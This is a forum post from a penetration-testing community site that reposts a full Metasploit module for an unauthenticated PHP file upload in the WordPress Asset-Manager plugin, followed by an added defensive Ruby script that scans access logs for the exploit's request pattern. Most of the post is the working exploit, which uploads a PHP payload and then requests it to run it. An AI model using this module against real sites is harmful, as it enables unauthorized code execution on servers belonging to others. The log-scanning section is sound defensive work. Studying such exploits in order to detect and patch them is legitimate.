China Network Penetration Testing Alliance

Title: WordPress Asset-Manager PHP File Upload Vulnerability

Author: admin    Time: 2012-12-31 09:22
Title: WordPress Asset-Manager PHP File Upload Vulnerability
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows uploading PHP files: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin's upload.php reads the 'Filedata' field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data,
    })

    # The upload handler echoes the stored filename on success.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```
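As an added defender-side example (not code from the forum post or from the Metasploit module above), this Ruby script scans combined-format web access logs for the two-request sequence the module produces: an unauthenticated POST to the Asset-Manager upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The log format, the 300-second correlation window and the sample lines are assumptions made for the example.

```ruby
# Added example (not part of the forum post or the Metasploit module):
# flags the two-request sequence the module above produces in combined-format
# access logs: an unauthenticated POST to Asset-Manager's upload.php followed
# by a GET of a .php file under wp-content/uploads/assets/temp/ from the same IP.
require 'time'

UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/\s?]+\.php}

# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "ref" "ua"
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# One finding per upload POST: 'upload_then_exec' for each GET of a temp .php
# from the same IP within +window+ seconds, otherwise 'upload_attempt' so a
# failed or blocked attempt (e.g. a 403 from a WAF) is still surfaced.
def detect_asset_manager_abuse(lines, window: 300)
  events = lines.map { |l| parse_line(l) }.compact
  findings = []
  events.each do |u|
    next unless u[:method] == 'POST' && u[:path] =~ UPLOAD_PATH
    hits = events.select do |e|
      e[:ip] == u[:ip] && e[:method] == 'GET' && e[:path] =~ TEMP_PHP &&
        e[:time] >= u[:time] && e[:time] - u[:time] <= window
    end
    if hits.empty?
      findings << { ip: u[:ip], kind: 'upload_attempt', path: u[:path], status: u[:status] }
    else
      hits.each { |h| findings << { ip: u[:ip], kind: 'upload_then_exec', path: h[:path], status: h[:status] } }
    end
  end
  findings
end

# Constructed sample lines (documentation-range IPs, made-up filenames).
SAMPLE_LOG = [
  '203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [31/Dec/2012:09:20:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzrt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [31/Dec/2012:09:21:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [31/Dec/2012:09:22:30 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 120 "-" "curl/7.26"',
]

detect_asset_manager_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $0
```

A benign image fetch from the temp directory is not flagged; only a .php object served from there after an upload POST is, which is also the condition under which serving PHP from wp-content/uploads should be blocked at the web server.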





Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2